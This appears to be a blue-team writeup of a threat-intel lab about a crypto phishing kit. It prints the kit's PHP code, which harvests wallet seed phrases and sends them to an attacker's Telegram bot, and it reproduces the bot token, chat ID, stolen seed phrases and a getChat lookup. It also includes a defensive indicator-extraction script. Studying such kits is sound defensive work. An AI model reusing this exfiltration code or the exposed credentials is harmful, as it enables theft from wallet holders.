GrabThePhisher — Threat Intel Lab Writeup
Overview
This writeup documents my approach to the lab GrabThePhisher available on the CyberDefenders website, a blue team-focused cyber threat intelligence lab that requires you to examine files related to a phishing kit that was hosted on a compromised server.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the lab before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the lab more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!
Scenario
A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.
Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).
Lab Analysis
Which wallet is used for asking the seed phrase?
The challenge starts by providing us with a zipped file which contains the files and assets that were used to impersonate the legitimate PancakeSwap exchange. The file index.html is the default landing page for the website and offers the victim a choice of several wallet types.
In the list of wallets, only Metamask has a corresponding folder, titled \metamask, in the provided challenge files.
What is the file name that has the code for the phishing kit?
Under the folder titled \metamask is a file called metamask.php, which contains the PHP code below.
<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/
$message = "<b>Welcome 2 The Jungle </b>
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";
sendTel($message);
function sendTel($message){
$id = "5442785564";
$token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
file_get_contents($filename);
$_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>
This PHP script is designed to collect Metamask wallet seed phrases and send them to a Telegram bot controlled by the attacker.
In which language was the kit written?
Based on the file above, the phishing kit was written in PHP.
What service does the kit use to retrieve the victim’s machine information?
Reviewing the PHP code, we can see a variable declared called $request.
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
The phishing kit appears to use Sypex Geo API to get the victim’s country and city based on their IP address.
How many seed phrases were already collected?
In the PHP code, we can see that the phishing kit saves the stolen data to log.txt on the attacker's server.
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
If we check the folder /log and look at the contents of the file log.txt, we can see how many seed phrases were collected, one per line.
number edge rebuild stomach review course sphere absurd memory among drastic total
bomb stairs satisfy host barrel absorb dentist prison capital faint hedgehog worth
father also recycle embody balance concert mechanic believe owner pair muffin hockey
Could you please provide the seed phrase associated with the most recent phishing incident?
Reviewing the contents of the file log.txt, we can also see the most recent seed phrase collected, which is the last line appended to the file.
father also recycle embody balance concert mechanic believe owner pair muffin hockey
Which medium was used for credential dumping?
In the PHP code, we can see that, in addition to being appended to the file log.txt, the seed phrase credentials are also dumped to Telegram.
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
What is the token for accessing the channel?
The PHP code declares a variable titled $token which stores the token for accessing the Telegram channel.
$token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
What is the Chat ID for the phisher’s channel?
The PHP code declares a variable titled $id which stores the chat ID for the phisher's Telegram channel.
$id = "5442785564";
What are the allies of the phish kit developer?
In the PHP code, we can see a comment containing a handle, which we can assume to be an ally of the phish kit developer.
/*
With love and respect to all the hustler out there,
This is a small gift to my brothers,
All the best with your luck,
Regards,
j1j1b1s@m3r0
*/
What is the full name of the Phish Actor?
What is the username of the Phish Actor?
The PHP code provides all the information needed, per the Telegram Bot API documentation, to recover the threat actor's details. The getChat method returns up-to-date information about the chat, including the threat actor's details.
The syntax for retrieving the information can be seen below:
https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getChat?chat_id=<CHAT_ID>
We can simply use the ID and token value identified earlier in the PHP code to retrieve the information.
https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564
This returns a ChatFullInfo object on success, including the full name and username of the Phish Actor.
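The static analysis steps above (pulling the Telegram token, chat ID, contacted hosts and drop file out of the kit, counting the phrases in log.txt, and assembling the getChat lookup) can be scripted for triage of any kit with the same structure. The following is an added example written for this writeup, not code from the lab; KIT_SOURCE and LOG_TXT are constructed samples that mimic metamask.php and log.txt with placeholder token and chat ID values, and the getChat URL is only built, never requested.

```python
import re
from urllib.parse import urlparse

# Constructed sample mimicking the structure of metamask.php from the lab.
# The token and chat ID are placeholders, not the values recovered in the lab.
KIT_SOURCE = r'''<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
function sendTel($message){
$id = "1234567890";
$token = "1234567890:AAExampleTokenPlaceholder_abcdefghijk";
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
file_get_contents($filename);
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
}
?>'''

# Constructed log.txt in the kit's format: one seed phrase per line, oldest first.
LOG_TXT = """alpha bravo charlie delta echo foxtrot golf hotel india juliet kilo lima
mike november oscar papa quebec romeo sierra tango uniform victor whiskey xray
"""

TOKEN_RE = re.compile(r'\$token\s*=\s*"(\d+:[A-Za-z0-9_-]{30,})"')   # bot token shape: <bot_id>:<secret>
CHAT_ID_RE = re.compile(r'\$id\s*=\s*"(-?\d+)"')                      # numeric chat_id
URL_RE = re.compile(r'https?://[A-Za-z0-9.-]+')                       # scheme + host only
LOG_RE = re.compile(r"'/log/'\s*\.\s*'([^']+)'")                      # drop-file name


def extract_iocs(source: str) -> dict:
    """Pull the exfil token, chat ID, contacted hosts and drop-file name out of the kit source."""
    token = TOKEN_RE.search(source)
    chat_id = CHAT_ID_RE.search(source)
    hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(source)})
    log_name = LOG_RE.search(source)
    return {
        "telegram_token": token.group(1) if token else None,
        "telegram_chat_id": chat_id.group(1) if chat_id else None,
        "contacted_hosts": hosts,
        "log_file": log_name.group(1) if log_name else None,
    }


def collected_phrases(log: str) -> list:
    """Return the lines of log.txt that look like 12- or 24-word seed phrases; the last one is the most recent."""
    return [line.strip() for line in log.splitlines() if len(line.split()) in (12, 24)]


def getchat_url(iocs: dict) -> str:
    """Assemble the Bot API getChat lookup from the extracted token and chat ID (built only, not sent)."""
    return f"https://api.telegram.org/bot{iocs['telegram_token']}/getChat?chat_id={iocs['telegram_chat_id']}"
```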
Conclusion
This was an interesting threat intel lab around analyzing a phish kit. I really enjoyed statically analyzing the PHP code and reverse engineering the Telegram API call to uncover the threat actor's details. Thank you for reading till the end and I hope you enjoyed this writeup!